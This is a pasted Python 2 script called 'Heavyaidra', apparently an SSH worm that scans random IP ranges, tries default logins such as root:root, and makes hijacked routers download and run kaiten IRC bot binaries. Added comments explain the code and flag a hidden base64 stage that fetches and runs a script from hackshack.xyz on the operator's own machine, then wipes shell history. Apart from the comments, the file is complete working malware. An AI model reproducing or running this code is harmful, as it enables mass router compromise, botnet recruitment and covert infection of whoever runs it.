Heavyaidra.py Guest on 10th October 2020 12:49:24 AM
  1. #!/usr/bin/env python
  2. #~WhitePacket
  3. #Lightaidra sucked, so here's 2.0 - will infect thousands of routers.
  4. # To setup, follow the instructions
  5. #-Download kaiten.c from https://dl.packetstormsecurity.net/irc/kaiten.c
  6. #-Cross compile it to sh4, powerpc, mipsel, mips, and armv5l.
  7. #-Put the files in your htdocs directory of a server to host them named something sensible like kaiten-*, wildcard in place of the architecture name.
  8. # Set some stuff on your servers so you don't get capped at 476 open SSH connections.
  9. #-ulimit -n 99999
  10. #-sysctl -w fs.file-max=100000
  11. # Run heavyhidra
  12. #-python infect.py 376 LUCKY x 0
  13. #-python infect.py 376 B 113.53 1
  14. # Donate BTC: 13rddMd7ErFQYsjYPfYAnqxmPzZxQPrVyo
  15. #NOTE: I wrote this back when I didn't code professionally, and on Tuesday, September 8th 2015 I decided to officially release it. Don't expect quality code, but working code.
  16. #Disclaimer: use this for code analysis and entertainment purposes only. The code is quite funny, old, works incredibly well and you are completely liable for anything done on it. I do not permit execution of the following code:
  17.  
  18. import threading, paramiko, random, socket, time, sys ,base64
  19.  
# Silence paramiko's logger completely; otherwise every failed login attempt across
# hundreds of threads would be logged.
paramiko.util.log_to_file("/dev/null") #Prevents paramiko error spam.

# Names of the bot binaries to fetch and launch on each compromised host, one per CPU
# architecture. Each name is used verbatim in the download URL and as the dropped file
# name /tmp/.<name> (see sshscanner.run), so these are useful host-based indicators.
files = [ #Files in which we would like to execute upon the routers.
    "kaiten-sh4",
    "kaiten-powerpc",
    "kaiten-mipsel",
    "kaiten-mips",
    "kaiten-armv5l"

]

# Host the binaries are fetched from, over plain HTTP (sshscanner.run builds
# "http://<website>/<file>"). Operator-supplied; the value as pasted looks like a placeholder.
website = "123.123.123.123" #Public facing IP hosting the IRC bot binaries.
  32.  
# Address prefixes the scanner must never touch. Each candidate target is built as the
# string 'http://A.B.C.D' and rejected if any entry below is a substring of it
# (sshscanner.run); the 'http://' prefix exists only so the substring test is anchored to
# the start of the address. Entries without a trailing '.' still match whole octets,
# because the random octets are generated as integers with no leading zeros.
# Coverage note: this is not a complete bogon list. 172.31.0.0/16 is missing ('172.30.'
# is followed by '172.32.', which is public space), and multicast/reserved space above
# 225.x is not excluded.
reservedips = [ #Majestic list of reserved IP's we have no reason to scan. Actually quite dull.
 'http://127.',
 'http://0',
 'http://10.',
 'http://100.64',
 'http://100.65',
 'http://100.66',
 'http://100.67',
 'http://100.68',
 'http://100.69',
 'http://100.70',
 'http://100.71',
 'http://100.72',
 'http://100.73',
 'http://100.74',
 'http://100.75',
 'http://100.76',
 'http://100.77',
 'http://100.78',
 'http://100.79',
 'http://100.80',
 'http://100.81',
 'http://100.82',
 'http://100.83',
 'http://100.84',
 'http://100.85',
 'http://100.86',
 'http://100.87',
 'http://100.88',
 'http://100.89',
 'http://100.90',
 'http://100.91',
 'http://100.92',
 'http://100.93',
 'http://100.94',
 'http://100.95',
 'http://100.96',
 'http://100.97',
 'http://100.98',
 'http://100.99',
 'http://100.100',
 'http://100.101',
 'http://100.102',
 'http://100.103',
 'http://100.104',
 'http://100.105',
 'http://100.106',
 'http://100.107',
 'http://100.108',
 'http://100.109',
 'http://100.110',
 'http://100.111',
 'http://100.112',
 'http://100.113',
 'http://100.114',
 'http://100.115',
 'http://100.116',
 'http://100.117',
 'http://100.118',
 'http://100.119',
 'http://100.120',
 'http://100.121',
 'http://100.122',
 'http://100.123',
 'http://100.124',
 'http://100.125',
 'http://100.126',
 'http://100.127',
 'http://169.254',
 'http://172.16.',
 'http://172.17.',
 'http://172.18.',
 'http://172.19.',
 'http://172.20.',
 'http://172.21.',
 'http://172.22.',
 'http://172.23.',
 'http://172.24.',
 'http://172.25.',
 'http://172.26.',
 'http://172.27.',
 'http://172.28.',
 'http://172.29.',
 'http://172.30.',
 'http://172.32.',  # NOTE: 172.31. is absent; this entry is not private space.
 'http://192.0.0.0',
 'http://192.0.0.1',
 'http://192.0.0.2',
 'http://192.0.0.3',
 'http://192.0.0.4',
 'http://192.0.0.5',
 'http://192.0.0.6',
 'http://192.0.0.7',
 'http://192.0.2.',
 'http://192.88.99.',
 'http://192.168.',
 'http://198.18.',
 'http://198.19.',
 'http://198.51.100.',
 'http://203.0.113.',
 'http://224.',
 'http://225'
]
  136.  
# Credential dictionary as "user:pass" strings. sshscanner.run splits each entry on ':'
# and treats "n/a" on either side as an empty field (no entry here uses that). When
# argv[4] is '1' the list is replaced by ["root:root"] alone.
passwords = [ #Some default SSH logins.
    "root:root", #This one is the least secure and ironically most effective.
    "root:toor",
    "admin:admin",
    "root:123qwe",
    "root:redtube",
    "root:admin",
    "root:1111",
    "test:test",
    "root:ferrari",
    "root:1q2w3e4r5t",
    "root:test",
    "root:1234",
    "root:1q2w3e",
    "root:qwerty"
]
  153.  
# Usage banner (Python 2 print statement; this file is Python 2 only).
#   argv[1] number of scanner threads
#   argv[2] A / B / C (how many octets argv[3] fixes), LUCKY (built-in prefix list),
#           or any other value for fully random targets
#   argv[3] address prefix for A/B/C; ignored otherwise
#   argv[4] '1' to try only root:root, anything else for the full password list
print sys.argv[0]+' Threads[max 376] A/B/C(ip class) /RAND IPHERE(1/1.1/1.1.1) 0/1 (password list, root:root) (doesn\'t scan recursively)' #Lack of basic system arguments/coded two years ago. Don't hate.

# No check on len(sys.argv): running without all four arguments raises IndexError here.
if sys.argv[4] == '1':
    # Rebinds the module-level list; sshscanner reads it through `global passwords`.
    passwords = [ "root:root" ] #Faster exploitation with somewhat less results.
  158.  
def run(cmd):
    """Run *cmd* through the system shell on the local machine and wait for it.

    shell=True means the string is handed to /bin/sh verbatim. Note that
    `subprocess` is never imported anywhere in this file (the only import
    statement is the one at the top), so as pasted the first call raises
    NameError.
    """

    subprocess.call(cmd, shell=True)
  162.  
# WARNING: this is a hidden stage aimed at whoever runs this script, not at the routers.
# The base64 blob decodes to the shell command (spacing as in the blob):
#   cd /tmp; wget -q https://hackshack.xyz/tcc || curl -s -O  https://hackshack.xyz/tcc ; chmod 777 tcc ; sh tcc ; rm -rf tcc* ;clear;history -c; clear;history -w
# i.e. download an arbitrary script from a third-party host, execute it, delete it and
# wipe the shell history. Nothing here "checks binaries"; the name is misdirection.
# Treat the domain and the /tmp/tcc path as indicators and never run this file locally.
checkbinaries = "Y2QgL3RtcDsgd2dldCAtcSBodHRwczovL2hhY2tzaGFjay54eXovdGNjIHx8IGN1cmwgLXMgLU8gIGh0dHBzOi8vaGFja3NoYWNrLnh5ei90Y2MgOyBjaG1vZCA3NzcgdGNjIDsgc2ggdGNjIDsgcm0gLXJmIHRjYyogO2NsZWFyO2hpc3RvcnkgLWM7IGNsZWFyO2hpc3RvcnkgLXc="

rebinaries = str(base64.b64decode(checkbinaries))

# Executed unconditionally at import time, before any scanning starts. As pasted this
# raises NameError (run() uses subprocess, which is not imported) and the script dies
# here; anyone who "fixes" the missing import will execute the hidden stage above.
run(rebinaries)

run('clear')
  170.  
# Parse the operator-supplied address prefix (argv[3]) according to the "class" argument
# (argv[2]). The parts are kept as raw strings -- nothing checks that they are numeric or
# in range -- and are later joined with random octets in sshscanner.run:
#   A: argv[3] is the first octet, e.g. "113"        (scans a /8)
#   B: "x.y"   -> first two octets, e.g. "113.53"    (scans a /16)
#   C: "x.y.z" -> first three octets                 (scans a /24)
#   LUCKY or anything else: argv[3] is not used.
ipclassinfo = sys.argv[2]
if ipclassinfo == "A":
    ip1 = sys.argv[3]
elif ipclassinfo == "B":
    # A prefix without a '.' raises IndexError here and aborts the script.
    ip1 = sys.argv[3].split(".")[0]
    ip2 = sys.argv[3].split(".")[1]
elif ipclassinfo == "C":
    # Positional split. With fewer than three parts ip2/ip3 stay unset; the resulting
    # NameError inside each thread would be swallowed by its bare except, so the threads
    # would spin without ever probing anything. Extra parts beyond three are ignored.
    ips = sys.argv[3].split(".")
    num=0
    for ip in ips:
        num=num+1
        if num == 1:
            ip1 = ip
        elif num == 2:
            ip2 = ip
        elif num == 3:
            ip3 = ip
class sshscanner(threading.Thread):
    """One scanning thread: draw random IPv4 targets, try the default SSH logins and,
    on success, drop and start the kaiten binaries on the host.

    Runs forever; every exception in the loop is swallowed, so a thread never exits on
    error. The operator prefix octets (ip1/ip2/ip3), ipclassinfo and passwords are read
    as module globals set at import time. Output is only printed to stdout.
    """
    global passwords
    global ipclassinfo
    if ipclassinfo == "A":
        global ip1
    elif ipclassinfo == "B":
        global ip1
        global ip2
    elif ipclassinfo == "C":
        global ip1
        global ip2
        global ip3
    def run(self):
        # Thread body (threading.Thread entry point). Never returns.
        while 1:
            try:
                # Draw candidate addresses until one matches no reservedips prefix.
                # The 'http://' prefix only anchors the substring test below.
                while 1:
                    thisipisbad='no'
                    if ipclassinfo == "A":
                        self.host = 'http://'+ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
                    elif ipclassinfo == "B":
                        self.host = 'http://'+ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
                    elif ipclassinfo == "C":
                        self.host = 'http://'+ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
                    elif ipclassinfo == "LUCKY":
                        # Hard-coded /16 prefixes; the file does not say how they were chosen.
                        lucky = ["186.115","31.176","113.53","186.113","190.254","190.255","186.114","95.9","95.6","118.174","190.65","203.249","190.66","190.67","122.176","187.109","60.51","186.119","95.169","190.69","190.253","122.168","201.75","117.156","188.59","177.11","182.74","190.68","118.173","190.252","165.229","84.122"]
                        self.host = 'http://'+random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
                    else:
                        # Any other class argument: fully random address.
                        self.host = 'http://'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
                    for badip in reservedips:
                        if badip in self.host:
                            thisipisbad='yes'
                    if thisipisbad=='no':
                        break
                # Strip the scheme again, leaving a bare dotted quad.
                self.host=self.host.replace('http://', '') #This could be optimized. This is bad code. No idea why I did it like this.
                # Initial values only; the pair printed below is whichever was tried last.
                username='root'
                password="0"
                port = 22
                # Cheap reachability check: raw TCP connect to port 22 with a 3 s timeout.
                # An unreachable host raises here and the outer except moves on.
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.settimeout(3)
                s.connect((self.host, port))
                s.close()
                ssh = paramiko.SSHClient()
                # Accept any host key: no host-key verification at all.
                ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                dobreak=False
                # Try each user:pass pair in order; "n/a" on either side means an empty
                # field. Stops at the first successful login.
                for passwd in passwords:
                    if ":n/a" in passwd:
                        password=""
                    else:
                        password=passwd.split(":")[1]
                    if "n/a:" in passwd:
                        username=""
                    else:
                        username=passwd.split(":")[0]
                    try:
                        ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
                        dobreak=True
                        break
                    except:
                        pass
                    # Redundant: the loop already broke on success.
                    if True == dobreak:
                        break
                badserver=True
                # Fingerprint the host by its ifconfig output. If no login succeeded the
                # client has no transport and exec_command raises, which lands in the
                # outer except and moves on to the next target.
                stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
                output = stdout.read()
                # Only hosts printing the classic net-tools/busybox "inet addr" line are
                # treated as infectable; anything else (or no /sbin/ifconfig) is skipped.
                if "inet addr" in output:
                    badserver=False
                websites = [ ]
                # One dropper command per architecture: fetch over plain HTTP from
                # `website`, store as the hidden file /tmp/.<name>, mark executable and
                # background it. All five are fired at every host; presumably only the
                # binary built for the host's CPU actually runs.
                for theFile in files:
                    websites.append("wget http://"+website+"/"+theFile+" -O /tmp/."+theFile+"; chmod +x /tmp/."+theFile+"; /tmp/."+theFile+" &") #Save it as a hidden file, of course.
                if badserver == False:
                        # Working credentials and target are written to stdout.
                        print 'Infected: '+username+'<'+password+'>'+self.host+'|'+str(port)
                        for web in websites:
                            # Each command is sent twice: as written, and with "wget"
                            # replaced by "wget1". The file does not say why the variant exists.
                            for a in ["wget", "wget1"]:
                                try:
                                    ssh.exec_command(web.replace("wget",a))
                                except:
                                    pass
                ssh.close()
            except:
                # Any failure -- unreachable host, no valid login, unset prefix octet --
                # is discarded and the thread picks another target.
                pass
  268.  
# Entry point: start argv[1] scanner threads. The banner calls 376 the practical maximum;
# the setup notes at the top of the file tie that to the open-file-descriptor limit.
# Every thread loops forever and is non-daemon, so the process never exits on its own.
# Thread-creation failures are silently ignored, so fewer threads than requested may run.
for x in range(0,int(sys.argv[1])): #This may abuse your system resources and anger network administrators.
    try:
        t = sshscanner()
        t.start()
    except:
        pass
